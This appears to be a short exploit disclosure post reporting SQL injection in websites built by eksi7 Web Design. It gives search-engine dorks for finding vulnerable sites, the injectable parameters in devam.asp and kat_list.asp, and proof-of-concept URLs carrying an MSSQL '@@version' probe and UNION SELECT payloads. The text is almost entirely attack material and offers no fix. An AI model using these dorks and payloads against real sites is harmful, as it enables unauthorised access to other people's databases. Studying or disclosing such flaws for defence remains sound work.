eksi7 Web Design Vulnerable to Multiple SQL Injection
Title : eksi7 Web Design Vulnerable to Multiple SQL Injection
Vendor: http://www.eksi7.com
Found by : p0pc0rn
Dork :
inurl:"devam.asp?haber_id="
inurl:"kat_list.asp?kat_id="
intext:"tasarim ve programlama eksi7 web hizmetleri"
intext:"design and programming eksi7 web services"
MSSQL
-----
http://site.com/path/haber/devam.asp?haber_id=[MSSQL]
POC
---
http://site.com/v4/haber/devam.asp?haber_id=7927+and+1=@@version
JetDatabase
-----------
http://site.com/path/haber/devam.asp?haber_id=[SQL]
http://site.com/path/icerik/kat_list.asp?kat_id=[SQL]
POC
---
http://site.com/abana/haber/devam.asp?haber_id=460 UnIoN SelECt 1 from test.a
http://site.com/rozey/icerik/kat_list.asp?kat_id=7 unIoN SelEct 1 from test.a
thanks,
-p0pc0rn-
0 comments:
Post a Comment